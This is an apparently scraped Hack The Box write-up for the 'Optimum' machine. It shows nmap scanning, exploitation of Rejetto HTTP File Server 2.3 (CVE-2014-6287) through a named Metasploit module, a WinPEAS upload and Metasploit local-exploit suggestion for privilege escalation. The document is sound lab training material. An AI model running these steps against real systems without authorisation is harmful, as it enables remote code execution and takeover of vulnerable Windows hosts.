Share
## https://sploitus.com/exploit?id=2AABDE5F-37AA-5FB5-BD10-1E8C9BF5F23D
# Optimum

---

# Optimum โ€“ Hack The Box Writeup

## Overview

In this machine, the objective is to gain initial access to a Windows host by exploiting a vulnerable web service and then escalate privileges to obtain the administrator flag.

The attack path involved:

* Service enumeration
* Exploitation of **Rejetto HTTP File Server 2.3**
* Initial access via **Metasploit**
* Privilege escalation using **WinPEAS** and **Metasploit post-exploitation modules**

---

# Reconnaissance

We start with a full TCP port scan to identify exposed services.

```bash
nmap -Pn -n -p- --min-rate 5000 -T4 
```

The scan reveals **port 80** open.

Next, we perform a service and version scan.

```bash
nmap -p80 -sSCV --min-rate 5000 -T4 
```

The result identifies the following service:

```
HttpFileServer 2.3
```

This service corresponds to **Rejetto HTTP File Server**, a lightweight file-sharing web server.

---

# Vulnerability Identification

After researching the detected version, we discover a known vulnerability:

```
CVE-2014-6287
```

This vulnerability allows **remote code execution** due to improper input sanitization.

---

# Exploitation

To exploit the vulnerability, we use **Metasploit**.

Start Metasploit:

```bash
msfconsole -q
```

Search for the appropriate module:

```bash
search rejetto
```

Load the exploit module:

```bash
use exploit/windows/http/rejetto_hfs_exec
```

Configure the required options:

```bash
set RHOSTS 
set RPORT 
set LHOST 
set LPORT 
run
```

Once executed, the exploit provides a **Meterpreter session** on the target machine.

---

# Initial Access

With the obtained Meterpreter session, we navigate the filesystem to retrieve the **user flag**.

```bash
cd
cat user.txt
whoami
```

The command output shows that we are logged in as:

```
kostas
```

Since this user does not have administrative privileges, we proceed with **privilege escalation**.

---

# Privilege Escalation Enumeration

To identify potential privilege escalation vectors, we upload **WinPEAS**, a well-known Windows privilege escalation enumeration tool.

```bash
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe
```

We then execute it:

```bash
shell
.\wp.exe
```

The output reveals useful information, including credentials associated with the user **kostas**.

---

# Privilege Escalation

After reviewing possible escalation vectors, we use the Metasploit module:

```
local_exploit_suggester
```

Load the module:

```bash
use post/multi/recon/local_exploit_suggester
```

Configure the session:

```bash
set SESSION 
run
```

This module suggests possible local exploits that can be used to escalate privileges.

After successfully escalating privileges, we obtain a shell with administrative rights.

Verification:

```bash
shell
whoami
```

---

# Administrator Access

Once administrative privileges are obtained, we navigate to the Administrator directory to retrieve the **root flag**.

```bash
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt
```

---

# Key Takeaways

This machine demonstrates several important penetration testing concepts:

* Proper **service enumeration** is critical to identifying vulnerable software.
* Publicly known vulnerabilities such as **CVE-2014-6287** can lead to immediate remote code execution.
* Tools like **WinPEAS** help identify privilege escalation opportunities in Windows environments.
* **Metasploit post-exploitation modules** can accelerate the privilege escalation process.